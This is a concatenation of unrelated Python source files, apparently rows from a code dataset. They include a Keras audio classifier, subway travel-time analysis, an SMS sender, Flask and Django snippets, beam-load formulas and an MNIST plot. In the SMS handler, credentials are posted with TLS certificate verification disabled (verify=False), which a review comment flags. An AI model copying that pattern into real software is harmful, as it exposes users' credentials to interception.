model.add(Conv2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(512, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(512, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(1024, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(1024, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
# Classifier head: three dropout-regularised dense layers, sigmoid output.
model.add(Flatten())
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
              optimizer=RMSprop(lr=0.0001),
              metrics=['accuracy'])
# Load pre-trained weights and run the classifier over every spectrogram
# under ./temp-spectrograms (one image per batch, original order preserved).
model.load_weights("model.h5")
test_data_generator = ImageDataGenerator(rescale=1./255)   # same normalisation as training
test_generator = test_data_generator.flow_from_directory(
    "./temp-spectrograms",
    target_size=(IMAGE_WIDTH, IMAGE_HEIGHT),
    batch_size=1,
    class_mode="binary",
    shuffle=False)     # keep file order so indices line up with filenames
filenames = test_generator.filenames
nb_samples = len(filenames)
probabilities = model.predict_generator(test_generator, nb_samples)
# Emit one "label;probability;path" record per spectrogram.
# BUG FIX: the log file was opened for writing but never written to — the
# records only went to stdout. Persist each record and keep the console echo.
with open("vocal-classifications.log.txt", 'w') as f:
    for index, probability in enumerate(probabilities):
        image_path = "./temp-spectrograms" + "/" +test_generator.filenames[index]
        # very high threshold: only near-certain predictions count as vocal
        label = "vocal" if probability > 0.99 else "nonvocal"
        record = label + ";" + str(probability[0]) + ";" + image_path
        f.write(record + "\n")
        print(record)
|
#coding:utf-8
import pandas as pd
import numpy as np
import datetime
'''
找到与某站点相关的最短事务,并计算平均步行时间
每天的步行时间最好分开算
'''
def getRusultDf(dataf, station_id, dateandtime):
    """Build a matrix of mean shortest travel times around *station_id*.

    Rows = entry stations station_id..23 (column 0 holds the entry id);
    columns 1.. = mean travel time to exit stations station_id,
    station_id-1, ... (-1 where no data). Hard-coded for a 23-station line.
    (Python 2 source; the function name keeps its original misspelling
    because the driver below calls it.)
    """
    hang = 23 - station_id + 1   # row count ("hang" = rows)
    lie = station_id             # column count ("lie" = columns)
    # NOTE(review): np.int was removed in NumPy >= 1.24 — use int there.
    X = np.zeros([hang, lie], dtype = np.int)
    cols = ['in_station']
    total = hang * (lie - 1)     # number of (in, out) pairs, for progress reporting
    p = 0
    for h in range(hang):
        in_id = station_id + h
        X[h, 0] = in_id
        for l in range(lie-1):
            out_id = station_id - l
            if (in_id) != (out_id):
                X[h, l+1] = getAvgTime(in_id, out_id, dateandtime, dataf)
            p+=1
            process = float(p * 100) / total
            print 'process : %.2f %%' % process
    # column headers: exit-station ids in descending order
    for c in range(lie-1):
        out_id = station_id - c
        cols.append(out_id)
    X = pd.DataFrame(X)
    X.columns = cols
    return X
def getAvgTime(in_id, out_id, dateandtime, dataf):
    """Mean of the per-day shortest travel times for the (in, out) pair.

    *dateandtime* is a list of YYYYMMDD strings; days with no trips
    (dfSelect returns -1) are skipped. Returns -1 when no day has data.
    """
    times = []
    for x in dateandtime:
        temp = dfSelect(in_id, out_id, x, dataf)
        if temp != -1:
            times.append(temp)
    #if (in_id == 15) & (out_id == 10):
    #    print times
    if times:
        return np.mean(times)
    else:
        return -1
def dfSelect(in_id, out_id, dateandtime, dataf):
    """Shortest-trip estimate for one station pair on one day.

    Filters trips entering between 06:30 and 23:59 on *dateandtime*
    (YYYYMMDD), takes the minimum total_time within each cluster label C,
    and returns the mean of those per-cluster minima; -1 when no rows match.
    """
    star_time = datetime.datetime.strptime(dateandtime + '063000', '%Y%m%d%H%M%S')
    end_time = datetime.datetime.strptime(dateandtime + '235900', '%Y%m%d%H%M%S')
    dataf = dataf[(pd.to_datetime(dataf.in_time) >= star_time) & (pd.to_datetime(dataf.in_time) <= end_time) & (dataf.in_id == in_id) & (dataf.out_id == out_id)].loc[:,['in_seconds', 'total_time', 'C']]
    if dataf.shape[0] == 0:
        return -1
    # NOTE(review): assumes cluster labels C are exactly 0..k-1 — clusters
    # with other labels (e.g. DBSCAN noise = -1) would be skipped. Confirm.
    n_clusters_ = len(set(dataf.C))
    mins = []
    for i in range(n_clusters_):
        tra_time = dataf[dataf.C == i].loc[:, 'total_time']
        mins.append(min(tra_time))
    if mins:
        return np.mean(mins)
    else:
        return -1
# --- driver: station 14 on line 1 ---
station_id = 14
dwell = 25.0   # assumed dwell time at the station — TODO confirm units (seconds)
print 'Start reading data...'
df = pd.read_csv("E:\Pycharm\PythonProjects\Subway\data\clusteResult\clusteResult_for"+ str(station_id) +"_line1_20141222-31.csv")
print 'Data has been read yet.'
#dt = ['20141222', '20141223', '20141224', '20141225', '20141226']
#dt = ['20141201', '20141202', '20141203', '20141204', '20141205']
#dt = ['20141206', '20141207']
#dt = ['20141201', '20141202', '20141203', '20141204']
dt = ['20141229', '20141230', '20141231']
resultDF = getRusultDf(df, station_id, dt)
print resultDF
#resultDF.to_csv('E:\Pycharm\PythonProjects\Subway\data\shortTravelTime\shortTravelTime_for14_line1_20141231.csv')
# Estimate the average walking time: for each reachable exit station x and
# entry station y, (x + y - z + dwell) / 2 where z is the direct time —
# NOTE(review): derivation of this identity is undocumented; verify.
temps = []
for i in range(1, station_id):
    x = resultDF.iloc[0, i]
    if x > 0:
        for j in range(23 - station_id + 1):
            y = resultDF.iloc[j, 1]
            z = resultDF.iloc[j, i]
            if y > 0 and z > 0:
                temp = (x + y - z + dwell)/2
                temps.append(temp)
if len(temps) > 0:
    print np.mean(temps)
else:
    print "None"
from .models import SMSLog, SMSLogManager
import os
import logging
import requests
# Module-level logger named after this module.
logger = logging.getLogger(__name__)
class Sparrow(object):
    """
    Sparrow SMS Handler for the App

    Python 2 source (``except Exception, e`` syntax). Credentials are read
    from SPARROW_* environment variables at construction time; a missing
    variable raises KeyError immediately.
    """
    def __init__(self):
        self.__outgoingurl='https://api.sparrowsms.com/call_in.php'
        self.__clientid = os.environ['SPARROW_CLIENT_ID']
        self.__username = os.environ['SPARROW_USERNAME']
        self.__password = os.environ['SPARROW_PASSWORD']
    def setparams(self, message, user):
        """Build the POST parameters for sending *message* to *user*."""
        params = dict(
            client_id = self.__clientid,
            username = self.__username,
            password = self.__password,
            to = str(user.phone.as_international),
            text = message
        )
        return params
    def sendMessage(self, message, user):
        """Send *message* to *user*'s phone; log the attempt in SMSLog.

        Returns the raw response body, or the exception on failure.
        """
        getparams = self.setparams(message, user)
        try:
            # NOTE(review): verify=False disables TLS certificate checking —
            # security risk; confirm whether the endpoint really requires it.
            req = requests.post(self.__outgoingurl, getparams, verify=False)
            if req.status_code == 200:
                logger.warn(message)
                sm = SMSLogManager()
                sm.updateLog(user, message)
                return req.content
            else:
                logger.warn("Error sending SMS to {0}".format(
                    user.phone.as_international))
                return req.content
        except Exception, e:
            logger.warn("Error sending SMS to {0}".format(
                user.phone.as_international))
            logger.warn("Error : {0}".format(e))
            # Because the request doesn't turn out well, we just pass it
            return e
    def sendDirectMessage(self, message, phone):
        """Send *message* straight to a phone number, without SMSLog bookkeeping."""
        logger.warn(message)
        params = dict(
            client_id = self.__clientid,
            username = self.__username,
            password = self.__password,
            to = phone.as_international,
            text = message
        )
        try:
            req = requests.post(self.__outgoingurl, params, verify=False)
            resp = req.content
            return resp
        except Exception, e:
            logger.warn("Error sending SMS to {0}".format(
                phone.as_international))
            logger.warn("Error : {0}".format(e))
            # Because the request doesn't turn out well, we just pass it
            return e
|
#!/usr/bin/env python
# encoding: utf-8
"""
tim_locatorAtTarget.py
Created by Tim Reischmann on 2011-05-12.
Copyright (c) 2011 Tim Reischmann. All rights reserved.
"""
from pymel.core import *
'''little_toolbox_start
tim_locatorAtTarget
tim_locatorAtTarget.main()
little_toolbox_end'''
|
from flask import Flask ,render_template
app = Flask(__name__)  # WSGI application object for this module's routes
@app.route('/')
def hello_world():
    """Serve the landing page."""
    template_name = "index.html"
    return render_template(template_name)
@app.route('/users/<username>/<id>') # for a route '/users/____/____', two parameters in the url get passed as username and id
def show_user_profile(username, id):
    """Echo the two URL path segments back to the client (debug prints kept)."""
    print(username)
    print(id)
    return "username: " + username + ", id: " + id
if __name__=="__main__":
    # Development server only — debug mode enables the reloader and debugger.
    app.run(debug=True)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-20 06:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: widen Playlist.mode choices.

    NOTE(review): the value '&status=completed' appears twice — once for
    'Completed' and once for 'On hold' — so 'On hold' can never round-trip
    distinctly. Historical migrations should not be edited; fix the choices
    in the model and add a new migration instead.
    """

    dependencies = [
        ('playlist', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='playlist',
            name='mode',
            field=models.CharField(choices=[('&status=completed', 'Completed'), ('&status=current', 'Currently watching'), ('&status=planned', 'Plan to watch'), ('&status=completed', 'On hold'), ('&status=dropped', 'droped')], default='&status=completed', max_length=25),
        ),
    ]
|
yes =True    # NOTE(review): unused — answers are compared as strings below
no = False   # NOTE(review): unused
# Taken from internet
Rest1 = "Joe's Gourmet Burgers" #Not Veg, Not Vegan , Not Gluten-Free
Rest2 = "Main Street Pizza Company" #Yes veg, Not Vegan , Yes Gluten-Free
Rest3 = "Corner Cafe" #Yes veg, Yes Vegan , Yes Gluten-Free
Rest4 = "Mama's Fine Italian" #Yes veg, Not Vegan , Not Gluten-Free
Rest5 = "The Chef's Kitchen" #Yes veg, Yes Vegan , Yes Gluten-Free
prompt = "Here are your restaurant choices:"
# Answers must be typed exactly 'yes'/'no'; anything else falls to the final else.
Vegan = str (input('Is anyone in your party vegan? Enter yes or no: '))
Vegetarian = str(input('Is anyone in your party vegetarian? Enter yes or no: '))
Glutenfree = str(input('Is anyone in your party Gluten Free? Enter yes or no: '))
# NOTE(review): several branches contradict the availability table above
# (e.g. vegan+gluten-free prints Rest2, which is not vegan), two branches
# repeat the same condition (see the duplicated yes/no/yes case), and the
# vegan-yes/vegetarian-no combinations hand-write different lists than the
# Rest constants. The whole ladder wants a rewrite against the table.
if Vegan == 'yes' and Vegetarian == 'yes' and Glutenfree == 'yes':
    print('Your options are: \n The Chef\'s kitchen. \n Cafe\' corner.')
elif Vegan == 'yes' and Vegetarian == 'yes' and Glutenfree == 'no':
    print('Your options are: \n The chef\'s kitchen. \n Cafe\'e corner.')
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree == 'no':
    print('Your options are: \n the chef\'s kitchen. \n Mama\'s fine Italian Kitchen \n Main Street Pizza. \n Corner Caf\'e ')
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree == 'yes':
    print(prompt, Rest2, Rest3 , Rest5 )
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree=='yes':
    # NOTE(review): unreachable — identical condition to the branch above
    print(prompt, Rest2, Rest3, Rest5)
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree=='no':
    # NOTE(review): unreachable — already handled two branches above
    print(prompt,Rest2, Rest3, Rest5 )
elif Vegan == 'no' and Vegetarian == 'no' and Glutenfree=='yes':
    print(prompt,Rest2, Rest3, Rest5 )
elif Vegan == 'no' and Vegetarian == 'no' and Glutenfree=='no':
    print(prompt, Rest1, Rest2, Rest3, Rest4, Rest5)
else:
    print('Select and option')
|
def bubble_sort(sort_list):
    """Sort *sort_list* in place (ascending) and print it, as before.

    Improvements over the original: the inner sweep skips the already-sorted
    tail, and the loop exits early when a full pass makes no swap — the
    observable behaviour (mutated list + one final print) is unchanged.
    """
    n = len(sort_list)
    for done in range(n):
        swapped = False
        for j in range(n - 1 - done):   # last `done` items are already in place
            if sort_list[j] > sort_list[j + 1]:
                sort_list[j], sort_list[j + 1] = sort_list[j + 1], sort_list[j]
                swapped = True
        if not swapped:
            break   # no swaps: list is sorted
    print(sort_list)
# Read `size` integers from the user, then sort and print them.
sort_list = []
size = int(input("Enter the size of the list-:"))
for i in range(size):
    unsort_list = int(input("Enter the the element: \t"))
    sort_list.append(unsort_list)
bubble_sort(sort_list)
|
from django.contrib import admin
from .models import Company, Product, ProductParameters, \
ParametersDescription, EcosystemsDescription, ClassesDescription, ProductClasses, ProductEcosystems
# Register your models here.
# Register every catalogue model with the default admin site, in the same
# order the original individual register() calls used.
for _model in (
    Company,
    Product,
    ProductParameters,
    ParametersDescription,
    EcosystemsDescription,
    ClassesDescription,
    ProductClasses,
    ProductEcosystems,
):
    admin.site.register(_model)
|
from collections import Counter
class Statistic(object):
    """Summary statistics over a generation's fitness values (lower = better)."""

    def __init__(self, fitness_list, father_med):
        """*father_med* is the parents' mean fitness; a falsy value skips
        the above/below tally (self.above / self.below are then unset)."""
        self.fitness_list = fitness_list
        if father_med:
            self.calc_abovebelow(father_med)
        #high_fit, low_fit, med

    def best(self):
        """Lowest (best) fitness, or None for an empty list — as before."""
        return min(self.fitness_list) if self.fitness_list else None

    def worse(self):
        """Highest (worst) fitness, or None for an empty list."""
        return max(self.fitness_list) if self.fitness_list else None

    def med(self):
        """Mean fitness (raises ZeroDivisionError on an empty list, as before)."""
        return sum(float(f) for f in self.fitness_list) / float(len(self.fitness_list))

    def n_rep(self):
        """Number of repeated entries: total count minus distinct count."""
        return sum(count - 1 for count in Counter(self.fitness_list).values())

    def calc_abovebelow(self, father_med):
        """Count individuals strictly above vs. at-or-below *father_med*."""
        above = 0
        below = 0
        for fitness in self.fitness_list:
            if fitness > father_med:
                above += 1
            else:
                # BUG FIX: was `below -= 1`, which drove the tally negative
                # instead of counting the at-or-below individuals.
                below += 1
        self.above = above
        self.below = below
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 11:39:00 2018
@author: Ilias
"""
import sys
def comInLoads(function, L, q, a=0, b=0):
    '''Combine all the load functions to compute the reactions.

    *function* is the NAME of the appropriate load function in this module
    (selected by the GUI) and is dispatched via getattr on the module.
    Names starting with 'c' are clamped-end bending cases returning
    (M1, M2, Q1, Q2); names starting with 'a' are axial cases returning
    (N1, N2). *q* is a scalar, or a (q1, q2) tuple for triangular loads.
    '''
    if function[0]=='c':
        m1,m2,q1,q2 = getattr(sys.modules[__name__], function)(L,q, a, b)
        return m1,m2,q1,q2
    elif function[0]=='a':
        n1, n2 = getattr(sys.modules[__name__], function)(L,q, a, b)
        return n1, n2
def cFE(L, q, a, b):
    """Fixed-fixed beam, uniform load q over the full span L (a, b unused).

    Returns (M1, -M2, -Q1, -Q2) with the classic qL/2 shears and qL^2/12
    fixed-end moments.
    """
    end_shear = q * L / 2
    end_moment = q * L * L / 12
    return end_moment, -end_moment, -end_shear, -end_shear
def cPE(L, q, a, b):
    """Fixed-fixed beam, partial uniform load q over [a, L-b].

    BUG FIX: the end moments were written ``.../12*L**2``, which MULTIPLIES
    by L**2 instead of dividing by 12*L**2. With the fix, a = b = 0 reduces
    to the full-span case cFE (M = q*L**2/12, Q = q*L/2), as it must.
    """
    Q1 = q*(L**4-(b**3)*(2*L-b)-a*(2*L**3-2*L*a**2+a**3))/(2*L**3)
    Q2 = q*(L**4-(a**3)*(2*L-a)-b*(2*L**3-2*L*b**2+b**3))/(2*L**3)
    M1 = q*(L**4-(b**3)*(4*L-3*b)-(a**2)*(6*L**2-8*a*L+3*a**2))/(12*L**2)
    M2 = q*(L**4-(a**3)*(4*L-3*a)-(b**2)*(6*L**2-8*b*L+3*b**2))/(12*L**2)
    return M1, -M2, -Q1, -Q2
def cFT(L, q, a, b):
    """Fixed-fixed beam, full-span triangular load.

    q is (q1, q2): q1 == 0 means the load rises toward the right end; a
    non-zero q1 means it falls, in which case the end values are mirrored.
    (a, b unused.)
    """
    q1, q2 = q
    shear_light = 3 * q2 * L / 20   # reaction at the lightly loaded end
    shear_heavy = 7 * q2 * L / 20   # reaction at the heavily loaded end
    moment_light = q2 * L * L / 30
    moment_heavy = q2 * L * L / 20
    if q1 != 0:
        # decreasing load: swap the two ends
        shear_light, shear_heavy = shear_heavy, shear_light
        moment_light, moment_heavy = moment_heavy, moment_light
    return moment_light, -moment_heavy, -shear_light, -shear_heavy
def cPT(L, q, a, b):
    """Fixed-fixed beam, partial triangular load between offsets a and b.

    q is (q1, q2): q1 == 0 means the load increases along the span; a
    non-zero q1 mirrors the end values (original comment, translated:
    "for an increasing triangle; for a decreasing load Q1/Q2 and M1/M2
    are swapped").
    """
    # re-express b as the distance of the load's far edge from the left end
    b=L-b
    q1, q2 = q
    # closed-form integrals of the triangular load's shear/moment influence
    Q1 = -a**2*q2/(2*L) + b**2*q2/(2*L) + 3*a**4*q2/(4*L**3) - 3*b**4*q2/(4*L**3) - 2*a**5*q2/(5*L**4) + 2*b**5*q2/(5*L**4)
    Q2 = -3*a**4*q2/(4*L**3) + 3*b**4*q2/(4*L**3) + 2*a**5*q2/(5*L**4) - 2*b**5*q2/(5*L**4)
    M1 = -a**3*q2/(3*L) + b**3*q2/(3*L) + a**4*q2/(2*L**2) - b**4*q2/(2*L**2) - a**5*q2/(5*L**3) + b**5*q2/(5*L**3)
    M2 = -a**4*q2/(4*L**2) + b**4*q2/(4*L**2) + a**5*q2/(5*L**3) - b**5*q2/(5*L**3)
    if q1 == 0:
        return M1, -M2, -Q1, -Q2
    else:
        # decreasing load: mirror the two ends
        Q1, Q2 = Q2, Q1
        M1, M2 = M2, M1
        return M1, -M2, -Q1, -Q2
def cPo(L, q, a, b):
    """Fixed-fixed beam, point load q at distance a from the left (b = L - a)."""
    alpha = a / L
    beta = b / L
    shear_left = q * beta**2 * (3 - 2 * beta)
    shear_right = q * alpha**2 * (3 - 2 * alpha)
    moment_left = q * a * b**2 / L**2
    moment_right = q * b * a**2 / L**2
    return moment_left, -moment_right, -shear_left, -shear_right
def cM(L, q, a, b):
    """Fixed-fixed beam, applied moment q at distance a from the left.

    Both end shears come out equal and opposite; the original returned
    (M1, M2, -Q1, Q2) which collapses to the same value in slots 3 and 4.
    """
    shear = 6 * q * a * b / L**3
    moment_left = q * b * (2 - 3 * b / L) / L
    moment_right = q * a * (2 - 3 * a / L) / L
    return moment_left, moment_right, -shear, -shear
def aFE(L, q, a, b):
    """Axial end reactions for a uniform load q over [a, L-b]."""
    loaded_len = L - a - b
    left = q * loaded_len * (L - a + b) / (2 * L)
    right = q * loaded_len * (L + a - b) / (2 * L)
    return -left, -right
def aPE(L, q, a, b):
    """Axial end reactions for a partial uniform load (same formula as aFE)."""
    span = L - a - b
    factor = q * span / (2 * L)
    return -factor * (L - a + b), -factor * (L + a - b)
def aFT(L, q, a, b):
    """Axial end reactions for a triangular load; q is (q1, q2), one of them 0.

    Uses the non-zero peak value; halving accounts for the triangle carrying
    half the equivalent uniform total.
    """
    peak = q[1] if q[0] == 0 else q[0]
    span = L - a - b
    left = peak * span * (L - a + b) / (2 * L)
    right = peak * span * (L + a - b) / (2 * L)
    return -left / 2, -right / 2
def aPT(L, q, a, b):
    """Axial end reactions for a partial triangular load (same as aFT)."""
    peak = q[1] if q[0] == 0 else q[0]
    span = L - a - b
    scale = peak * span / (2 * L)
    return -scale * (L - a + b) / 2, -scale * (L + a - b) / 2
def aPo(L, q, a, b):
    """Axial point load q at distance a from the left end (b from the right):
    lever-rule split between the two supports."""
    return -q * b / L, -q * a / L
def aM(L, q, a, b):
    """Axial reactions for load q at offset a — same lever-rule split as aPo
    (the original named the results M1/M2, but they are end reactions)."""
    left_share = q * b / L
    right_share = q * a / L
    return -left_share, -right_share
|
import chainer
import matplotlib
import matplotlib.pyplot as plt

# BUG FIX: the file contained a bare '% matplotlib' / 'inline' pair — an
# IPython notebook magic that is a SyntaxError in a plain .py module. It is
# kept below as a comment for anyone pasting this back into a notebook.
# %matplotlib inline

# Load the MNIST dataset from pre-built chainer downloader
train, test = chainer.datasets.get_mnist(ndim=1)
ROW = 4
COLUMN = 5
for i in range(ROW * COLUMN):
    # train[i][0] is i-th image data with size 28x28
    image = train[i][0].reshape(28, 28)   # not necessary to reshape if ndim is set to 2
    plt.subplot(ROW, COLUMN, i + 1)       # subplot grid of ROW x COLUMN panels
    plt.imshow(image, cmap='gray')        # cmap='gray' is for black and white picture.
    # train[i][1] is i-th digit label
    plt.title('label = {}'.format(train[i][1]))
    plt.axis('off')        # do not show axis value
plt.tight_layout()         # automatic padding between subplots
plt.savefig('images/mnist_plot.png')
plt.show()
|
# (Scraper residue from the dataset viewer page — not part of any source file.)
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.